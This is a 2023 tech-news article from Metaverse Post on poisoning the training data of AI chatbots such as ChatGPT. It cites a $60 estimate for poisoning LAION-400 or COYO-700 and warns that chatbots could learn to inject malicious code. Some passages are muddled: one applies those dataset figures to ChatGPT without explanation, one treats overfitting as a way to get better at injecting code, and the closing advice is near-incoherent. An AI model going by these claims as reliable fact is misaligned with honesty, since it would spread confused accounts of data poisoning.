News Report Technology
May 10, 2023

Experts Caution Against ‘Malicious Inserts’ into AI Datasets in ChatGPT

In Brief

ChatGPT is potentially vulnerable due to the training data.

According to researchers, for only $60 in the US, we could poison 0.01% of the LAION-400 or COYO-700 data sets in 2022.

ChatGPT technology is becoming increasingly popular, but recent research suggests that this technology may be vulnerable due to the training data it uses. As models become more complex and data sets become larger and more complex, malicious actors could exploit this vulnerability to manipulate the data sets and cause the machine learning models to produce inaccurate results.

Experts Caution Against 'Malicious Inserts' into AI Datasets in ChatGPT
@Midjourney / TataMatalata#9861
Recommended: Top 10 Most Promising Stocks Predicted by ChatGPT (AI) to Outperform Leading World Funds in 2023

The primary concern is that chatbot databases are often “conditionally verified” data sets, meaning that there is a certain level of trust put into the data without extensive verification. In other words, these datasets can often have underlying issues that have not been considered. Although validation of datasets is often not performed due to their large size, there exists the potential for malicious actors to manipulate this data.

In fact, researchers have suggested that by 2022, attackers could spend an estimated $60 to poison 0.01% of the LAION-400 or COYO-700 data sets. Although this does not sound like much, malicious actors could use this poisoned data for their own gain if left unchecked. The malicious data can eventually leak into larger datasets, corrupting data quality and leading to unreliable machine-learning models.

It is necessary to take steps to safeguard databases against malicious data. Aggregating several data sources should become the standard for chatbot training datasets to ensure the data is reliable and accurate. Additionally, companies should experiment with datasets to ensure they are not vulnerable to malicious actors.

AI Chatbots with Malicious Code Can Be Vulnerable to Hacking

The threat of malicious code in chatbots can be quite serious; malicious code can be used to steal user data, enable malicious access to servers, and enable malicious activities such as money laundering or data exfiltration. If an AI chatbot is trained on data with malicious inserts, it could unknowingly inject the malicious code into its responses and unknowingly be used as a tool for malicious gain.

It is possible for malicious actors to take advantage of this vulnerability by either deliberately or inadvertently introducing malicious code into the training data. In addition, since AI chatbots learn from the data it is presented with, this could also potentially lead to them learning incorrect responses or even malicious behavior.

@Midjourney / TataMatalata#9861

Another danger that AI chatbots may face is that of “overfitting.” This is when prediction models are trained too closely on the data they were given, thus leading to poor predictions when presented with new data. This can be a particular problem as AI chatbots trained on malicious code could potentially become more effective at injecting malicious code into their responses as they become more familiar with the data.

It is essential to be aware of the risks and take precautions to guarantee the training data used to teach ChatGPT is secure and reliable to prevent these potential weaknesses. The initial data used for training must also be kept separate and unique; the promotion of “malicious inserts” must not conflict with or overlap with other sources. It should be examined and compared to other domains if “capturing” multiple confirmed domains is feasible to validate the data.

Chatbot technology promises to transform how people conduct human discussions. But before it can realize its full potential, it needs to be improved and safeguarded. Datasets for chatbots need to be well-checked and readied to fend off malicious actors. By doing this, we can ensure that we fully utilize the technology’s potential and keep pushing the limits of artificial intelligence.

Read more about AI:

Disclaimer

In line with the Trust Project guidelines, please note that the information provided on this page is not intended to be and should not be interpreted as legal, tax, investment, financial, or any other form of advice. It is important to only invest what you can afford to lose and to seek independent financial advice if you have any doubts. For further information, we suggest referring to the terms and conditions as well as the help and support pages provided by the issuer or advertiser. MetaversePost is committed to accurate, unbiased reporting, but market conditions are subject to change without notice.

About The Author

Damir is the team leader, product manager, and editor at Metaverse Post, covering topics such as AI/ML, AGI, LLMs, Metaverse, and Web3-related fields. His articles attract a massive audience of over a million users every month. He appears to be an expert with 10 years of experience in SEO and digital marketing. Damir has been mentioned in Mashable, Wired, Cointelegraph, The New Yorker, Inside.com, Entrepreneur, BeInCrypto, and other publications. He travels between the UAE, Turkey, Russia, and the CIS as a digital nomad. Damir earned a bachelor's degree in physics, which he believes has given him the critical thinking skills needed to be successful in the ever-changing landscape of the internet. 

More articles
Damir Yalalov
Damir Yalalov

Damir is the team leader, product manager, and editor at Metaverse Post, covering topics such as AI/ML, AGI, LLMs, Metaverse, and Web3-related fields. His articles attract a massive audience of over a million users every month. He appears to be an expert with 10 years of experience in SEO and digital marketing. Damir has been mentioned in Mashable, Wired, Cointelegraph, The New Yorker, Inside.com, Entrepreneur, BeInCrypto, and other publications. He travels between the UAE, Turkey, Russia, and the CIS as a digital nomad. Damir earned a bachelor's degree in physics, which he believes has given him the critical thinking skills needed to be successful in the ever-changing landscape of the internet. 

Hot Stories

Top Investment Projects of the Week 25-29.03

by Viktoriia Palchik
March 29, 2024
Join Our Newsletter.
Latest News

Top Investment Projects of the Week 25-29.03

by Viktoriia Palchik
March 29, 2024

Supply and Demand Zones

Cryptocurrency, like any other currency, is a financial instrument based on the fundamental economic principles of supply ...

Know More

Top 10 Crypto Wallets in 2024

With the current fast-growing crypto market, the significance of reliable and secure wallet solutions cannot be emphasized ...

Know More
Join Our Innovative Tech Community
Read More
Read more
Modular Blockchain Sophon Raises $10M Funding from Paper Ventures and Maven11 Amid Veil of Mystery
Business News Report
Modular Blockchain Sophon Raises $10M Funding from Paper Ventures and Maven11 Amid Veil of Mystery
March 29, 2024
Arbitrum Foundation Announces Third Phase Of Grants Program, Opens Applications From April 15th
News Report Technology
Arbitrum Foundation Announces Third Phase Of Grants Program, Opens Applications From April 15th
March 29, 2024
Top Investment Projects of the Week 25-29.03
Digest Technology
Top Investment Projects of the Week 25-29.03
March 29, 2024
Vitalik Buterin Advocates For Memecoins’ Potential In Crypto Sector, Favors ‘Good Memecoins’
News Report Technology
Vitalik Buterin Advocates For Memecoins’ Potential In Crypto Sector, Favors ‘Good Memecoins’
March 29, 2024